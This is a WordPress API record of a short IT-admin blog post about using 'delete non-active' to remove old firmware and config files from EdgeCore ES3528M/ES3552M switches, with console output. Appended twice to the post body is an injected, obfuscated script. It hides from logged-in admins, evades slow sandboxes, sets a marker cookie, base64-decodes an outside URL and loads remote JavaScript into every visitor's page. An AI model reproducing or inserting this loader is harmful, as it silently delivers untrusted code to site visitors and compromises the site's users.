{"id":225,"date":"2013-05-30T12:01:39","date_gmt":"2013-05-30T10:01:39","guid":{"rendered":"http:\/\/blog.it-admin.sk\/?p=225"},"modified":"2025-10-27T02:25:09","modified_gmt":"2025-10-27T01:25:09","slug":"rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m","status":"publish","type":"post","link":"https:\/\/blog.it-admin.sk\/en\/2013\/05\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\/","title":{"rendered":"Quickie: Delete unused files on ES3528_52M"},"content":{"rendered":"<p>In our network we have deployed dozens of EdgeCore ES3528M\/ES3552M switches. However, after frequent upgrades and configuration changes, often happens that old config files, opcodes, boot-roms will remain int the flash memory and are no longer needed. Fortunately, since opcode version 1.4.4.0 there is command available which deletes all inactive files from flash memory. Unfortunately, it lacks invocation of command via SNMP but surely it will be added over time.<\/p>\n<pre>\nConsole#dir                                                                     \n          File name                        File type       Startup Size (byte)  \n -------------------------------------     --------------  ------- -----------  \n Unit1:                                                                         \n          ES3528_52M_diag_V1.0.0.8.bix     Boot-Rom Image  Y          1382696   \n          ES3528_52M_opcode_V1.4.4.0.bix   Operation Code  Y          4706820   \n          opcode_v1.1.3.7.bix              Operation Code  N          3848904   \n          Factory_Default_Config.cfg       Config File     N              455   \n          snspsobm63.cfg                   Config File     N             6763   \n          startup1.cfg                     Config File     Y             4721   \n ---------------------------------------------------------------------------    \n                                                  Total free space:   5111808   \n<\/pre>\n<p>We have several unused files in flash memory. So, we delete it.<\/p>\n<pre>      \nConsole#delete non-active                                                       \nAre you sure to delete non-active file(s)? [Y]es\/[N]o: y                        \n                                                                                \n Unit 1:                                                                        \n      Factory Default Configuration file couldn't be deleted.                   \n      Success to delete [opcode_v1.1.3.7.bix]                                   \n      Success to delete [snspsobm63.cfg]                                        \nConsole#\n<\/pre>\n<p>Done. Now we have just needed files in our flash memory.<\/p>\n<pre>\nConsole#dir                                                                     \n          File name                        File type       Startup Size (byte)  \n -------------------------------------     --------------  ------- -----------  \n Unit1:                                                                         \n          ES3528_52M_diag_V1.0.0.8.bix     Boot-Rom Image  Y          1382696   \n          ES3528_52M_opcode_V1.4.4.0.bix   Operation Code  Y          4706820   \n          Factory_Default_Config.cfg       Config File     N              455   \n          startup1.cfg                     Config File     Y             4721   \n ---------------------------------------------------------------------------    \n                                                  Total free space:   9175040   \n<\/pre>\n<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i&lt;20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<&lt;2)|(h2>>4);o2=((h2&15)<&lt;4)|(h3>>2);o3=((h3&3)<&lt;6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9ha21jZG5yZXBvLmNvbS9leGl0anM=');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i&lt;20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<&lt;2)|(h2>>4);o2=((h2&15)<&lt;4)|(h3>>2);o3=((h3&3)<&lt;6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9ha21jZG5yZXBvLmNvbS9leGl0anM=');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>In our network we have deployed dozens of EdgeCore ES3528M\/ES3552M switches. However, after frequent upgrades and configuration changes, often happens that old config files, opcodes, boot-roms will remain int the flash memory and are no longer needed. Fortunately, since opcode version 1.4.4.0 there is command available which deletes all inactive &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[18],"tags":[],"class_list":["post-225","post","type-post","status-publish","format-standard","hentry","category-networking"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 4.9.9 - aioseo.com -->\n\t<meta name=\"description\" content=\"In our network we have deployed dozens of EdgeCore ES3528M\/ES3552M switches. However, after frequent upgrades and configuration changes, often happens that old config files, opcodes, boot-roms will remain int the flash memory and are no longer needed. Fortunately, since opcode version 1.4.4.0 there is command available which deletes all inactive files from flash memory. Unfortunately,\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"admin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/blog.it-admin.sk\/en\/2013\/05\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\/\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 4.9.9\" \/>\n\t\t<meta property=\"og:locale\" content=\"en_US\" \/>\n\t\t<meta property=\"og:site_name\" content=\"IT admin blog\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"Quickie: Delete unused files on ES3528_52M | IT admin blog\" \/>\n\t\t<meta property=\"og:description\" content=\"In our network we have deployed dozens of EdgeCore ES3528M\/ES3552M switches. However, after frequent upgrades and configuration changes, often happens that old config files, opcodes, boot-roms will remain int the flash memory and are no longer needed. Fortunately, since opcode version 1.4.4.0 there is command available which deletes all inactive files from flash memory. Unfortunately,\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/blog.it-admin.sk\/en\/2013\/05\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\/\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2013-05-30T10:01:39+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2025-10-27T01:25:09+00:00\" \/>\n\t\t<meta name=\"twitter:card\" content=\"summary\" \/>\n\t\t<meta name=\"twitter:title\" content=\"Quickie: Delete unused files on ES3528_52M | IT admin blog\" \/>\n\t\t<meta name=\"twitter:description\" content=\"In our network we have deployed dozens of EdgeCore ES3528M\/ES3552M switches. However, after frequent upgrades and configuration changes, often happens that old config files, opcodes, boot-roms will remain int the flash memory and are no longer needed. Fortunately, since opcode version 1.4.4.0 there is command available which deletes all inactive files from flash memory. Unfortunately,\" \/>\n\t\t<script type=\"application\/ld+json\" class=\"aioseo-schema\">\n\t\t\t{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/2013\\\/05\\\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\\\/#article\",\"name\":\"Quickie: Delete unused files on ES3528_52M | IT admin blog\",\"headline\":\"Quickie: Delete unused files on ES3528_52M\",\"author\":{\"@id\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/author\\\/admin\\\/#author\"},\"publisher\":{\"@id\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/#organization\"},\"datePublished\":\"2013-05-30T12:01:39+02:00\",\"dateModified\":\"2025-10-27T02:25:09+01:00\",\"inLanguage\":\"en-US\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/2013\\\/05\\\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\\\/#webpage\"},\"isPartOf\":{\"@id\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/2013\\\/05\\\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\\\/#webpage\"},\"articleSection\":\"Networking\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/2013\\\/05\\\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\\\/#breadcrumblist\",\"itemListElement\":[{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/blog.it-admin.sk\\\/en#listItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\",\"nextItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/category\\\/networking\\\/#listItem\",\"name\":\"Networking\"}},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/category\\\/networking\\\/#listItem\",\"position\":2,\"name\":\"Networking\",\"item\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/category\\\/networking\\\/\",\"nextItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/2013\\\/05\\\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\\\/#listItem\",\"name\":\"Quickie: Delete unused files on ES3528_52M\"},\"previousItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/blog.it-admin.sk\\\/en#listItem\",\"name\":\"Home\"}},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/2013\\\/05\\\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\\\/#listItem\",\"position\":3,\"name\":\"Quickie: Delete unused files on ES3528_52M\",\"previousItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/category\\\/networking\\\/#listItem\",\"name\":\"Networking\"}}]},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/#organization\",\"name\":\"IT admin blog\",\"description\":\"Notepad of an IT administrator\",\"url\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/author\\\/admin\\\/#author\",\"url\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/author\\\/admin\\\/\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/2013\\\/05\\\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\\\/#authorImage\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/4e55ac81817144fbcbfb58b7c6c1e455dd5b71a05e201ff646121ee7aac7d7ab?s=96&r=g\",\"width\":96,\"height\":96,\"caption\":\"admin\"}},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/2013\\\/05\\\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\\\/#webpage\",\"url\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/2013\\\/05\\\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\\\/\",\"name\":\"Quickie: Delete unused files on ES3528_52M | IT admin blog\",\"description\":\"In our network we have deployed dozens of EdgeCore ES3528M\\\/ES3552M switches. However, after frequent upgrades and configuration changes, often happens that old config files, opcodes, boot-roms will remain int the flash memory and are no longer needed. Fortunately, since opcode version 1.4.4.0 there is command available which deletes all inactive files from flash memory. Unfortunately,\",\"inLanguage\":\"en-US\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/#website\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/2013\\\/05\\\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\\\/#breadcrumblist\"},\"author\":{\"@id\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/author\\\/admin\\\/#author\"},\"creator\":{\"@id\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/author\\\/admin\\\/#author\"},\"datePublished\":\"2013-05-30T12:01:39+02:00\",\"dateModified\":\"2025-10-27T02:25:09+01:00\"},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/#website\",\"url\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/\",\"name\":\"IT admin blog\",\"description\":\"Notepad of an IT administrator\",\"inLanguage\":\"en-US\",\"publisher\":{\"@id\":\"https:\\\/\\\/blog.it-admin.sk\\\/en\\\/#organization\"}}]}\n\t\t<\/script>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"Quickie: Delete unused files on ES3528_52M | IT admin blog","description":"In our network we have deployed dozens of EdgeCore ES3528M\/ES3552M switches. However, after frequent upgrades and configuration changes, often happens that old config files, opcodes, boot-roms will remain int the flash memory and are no longer needed. Fortunately, since opcode version 1.4.4.0 there is command available which deletes all inactive files from flash memory. Unfortunately,","canonical_url":"https:\/\/blog.it-admin.sk\/en\/2013\/05\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\/","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/blog.it-admin.sk\/en\/2013\/05\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\/#article","name":"Quickie: Delete unused files on ES3528_52M | IT admin blog","headline":"Quickie: Delete unused files on ES3528_52M","author":{"@id":"https:\/\/blog.it-admin.sk\/en\/author\/admin\/#author"},"publisher":{"@id":"https:\/\/blog.it-admin.sk\/en\/#organization"},"datePublished":"2013-05-30T12:01:39+02:00","dateModified":"2025-10-27T02:25:09+01:00","inLanguage":"en-US","mainEntityOfPage":{"@id":"https:\/\/blog.it-admin.sk\/en\/2013\/05\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\/#webpage"},"isPartOf":{"@id":"https:\/\/blog.it-admin.sk\/en\/2013\/05\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\/#webpage"},"articleSection":"Networking"},{"@type":"BreadcrumbList","@id":"https:\/\/blog.it-admin.sk\/en\/2013\/05\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\/#breadcrumblist","itemListElement":[{"@type":"ListItem","@id":"https:\/\/blog.it-admin.sk\/en#listItem","position":1,"name":"Home","item":"https:\/\/blog.it-admin.sk\/en","nextItem":{"@type":"ListItem","@id":"https:\/\/blog.it-admin.sk\/en\/category\/networking\/#listItem","name":"Networking"}},{"@type":"ListItem","@id":"https:\/\/blog.it-admin.sk\/en\/category\/networking\/#listItem","position":2,"name":"Networking","item":"https:\/\/blog.it-admin.sk\/en\/category\/networking\/","nextItem":{"@type":"ListItem","@id":"https:\/\/blog.it-admin.sk\/en\/2013\/05\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\/#listItem","name":"Quickie: Delete unused files on ES3528_52M"},"previousItem":{"@type":"ListItem","@id":"https:\/\/blog.it-admin.sk\/en#listItem","name":"Home"}},{"@type":"ListItem","@id":"https:\/\/blog.it-admin.sk\/en\/2013\/05\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\/#listItem","position":3,"name":"Quickie: Delete unused files on ES3528_52M","previousItem":{"@type":"ListItem","@id":"https:\/\/blog.it-admin.sk\/en\/category\/networking\/#listItem","name":"Networking"}}]},{"@type":"Organization","@id":"https:\/\/blog.it-admin.sk\/en\/#organization","name":"IT admin blog","description":"Notepad of an IT administrator","url":"https:\/\/blog.it-admin.sk\/en\/"},{"@type":"Person","@id":"https:\/\/blog.it-admin.sk\/en\/author\/admin\/#author","url":"https:\/\/blog.it-admin.sk\/en\/author\/admin\/","name":"admin","image":{"@type":"ImageObject","@id":"https:\/\/blog.it-admin.sk\/en\/2013\/05\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\/#authorImage","url":"https:\/\/secure.gravatar.com\/avatar\/4e55ac81817144fbcbfb58b7c6c1e455dd5b71a05e201ff646121ee7aac7d7ab?s=96&r=g","width":96,"height":96,"caption":"admin"}},{"@type":"WebPage","@id":"https:\/\/blog.it-admin.sk\/en\/2013\/05\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\/#webpage","url":"https:\/\/blog.it-admin.sk\/en\/2013\/05\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\/","name":"Quickie: Delete unused files on ES3528_52M | IT admin blog","description":"In our network we have deployed dozens of EdgeCore ES3528M\/ES3552M switches. However, after frequent upgrades and configuration changes, often happens that old config files, opcodes, boot-roms will remain int the flash memory and are no longer needed. Fortunately, since opcode version 1.4.4.0 there is command available which deletes all inactive files from flash memory. Unfortunately,","inLanguage":"en-US","isPartOf":{"@id":"https:\/\/blog.it-admin.sk\/en\/#website"},"breadcrumb":{"@id":"https:\/\/blog.it-admin.sk\/en\/2013\/05\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\/#breadcrumblist"},"author":{"@id":"https:\/\/blog.it-admin.sk\/en\/author\/admin\/#author"},"creator":{"@id":"https:\/\/blog.it-admin.sk\/en\/author\/admin\/#author"},"datePublished":"2013-05-30T12:01:39+02:00","dateModified":"2025-10-27T02:25:09+01:00"},{"@type":"WebSite","@id":"https:\/\/blog.it-admin.sk\/en\/#website","url":"https:\/\/blog.it-admin.sk\/en\/","name":"IT admin blog","description":"Notepad of an IT administrator","inLanguage":"en-US","publisher":{"@id":"https:\/\/blog.it-admin.sk\/en\/#organization"}}]},"og:locale":"en_US","og:site_name":"IT admin blog","og:type":"article","og:title":"Quickie: Delete unused files on ES3528_52M | IT admin blog","og:description":"In our network we have deployed dozens of EdgeCore ES3528M\/ES3552M switches. However, after frequent upgrades and configuration changes, often happens that old config files, opcodes, boot-roms will remain int the flash memory and are no longer needed. Fortunately, since opcode version 1.4.4.0 there is command available which deletes all inactive files from flash memory. Unfortunately,","og:url":"https:\/\/blog.it-admin.sk\/en\/2013\/05\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\/","article:published_time":"2013-05-30T10:01:39+00:00","article:modified_time":"2025-10-27T01:25:09+00:00","twitter:card":"summary","twitter:title":"Quickie: Delete unused files on ES3528_52M | IT admin blog","twitter:description":"In our network we have deployed dozens of EdgeCore ES3528M\/ES3552M switches. However, after frequent upgrades and configuration changes, often happens that old config files, opcodes, boot-roms will remain int the flash memory and are no longer needed. Fortunately, since opcode version 1.4.4.0 there is command available which deletes all inactive files from flash memory. Unfortunately,"},"aioseo_meta_data":{"post_id":"225","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":"default","schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"breadcrumb_settings":null,"limit_modified_date":false,"ai":null,"created":"2024-02-29 10:17:20","updated":"2025-10-28 05:34:02","seo_analyzer_scan_date":null},"aioseo_breadcrumb":"<div class=\"aioseo-breadcrumbs\"><span class=\"aioseo-breadcrumb\">\n\t\t\t<a href=\"https:\/\/blog.it-admin.sk\/en\" title=\"Home\">Home<\/a>\n\t\t<\/span><span class=\"aioseo-breadcrumb-separator\">&raquo;<\/span><span class=\"aioseo-breadcrumb\">\n\t\t\t<a href=\"https:\/\/blog.it-admin.sk\/en\/category\/networking\/\" title=\"Networking\">Networking<\/a>\n\t\t<\/span><span class=\"aioseo-breadcrumb-separator\">&raquo;<\/span><span class=\"aioseo-breadcrumb\">\n\t\t\tQuickie: Delete unused files on ES3528_52M\n\t\t<\/span><\/div>","aioseo_breadcrumb_json":[{"label":"Home","link":"https:\/\/blog.it-admin.sk\/en"},{"label":"Networking","link":"https:\/\/blog.it-admin.sk\/en\/category\/networking\/"},{"label":"Quickie: Delete unused files on ES3528_52M","link":"https:\/\/blog.it-admin.sk\/en\/2013\/05\/rychlovka-odstranenie-nepotrebnych-suborov-na-es3528_52m\/"}],"_links":{"self":[{"href":"https:\/\/blog.it-admin.sk\/en\/wp-json\/wp\/v2\/posts\/225","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.it-admin.sk\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.it-admin.sk\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.it-admin.sk\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.it-admin.sk\/en\/wp-json\/wp\/v2\/comments?post=225"}],"version-history":[{"count":4,"href":"https:\/\/blog.it-admin.sk\/en\/wp-json\/wp\/v2\/posts\/225\/revisions"}],"predecessor-version":[{"id":677,"href":"https:\/\/blog.it-admin.sk\/en\/wp-json\/wp\/v2\/posts\/225\/revisions\/677"}],"wp:attachment":[{"href":"https:\/\/blog.it-admin.sk\/en\/wp-json\/wp\/v2\/media?parent=225"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.it-admin.sk\/en\/wp-json\/wp\/v2\/categories?post=225"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.it-admin.sk\/en\/wp-json\/wp\/v2\/tags?post=225"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}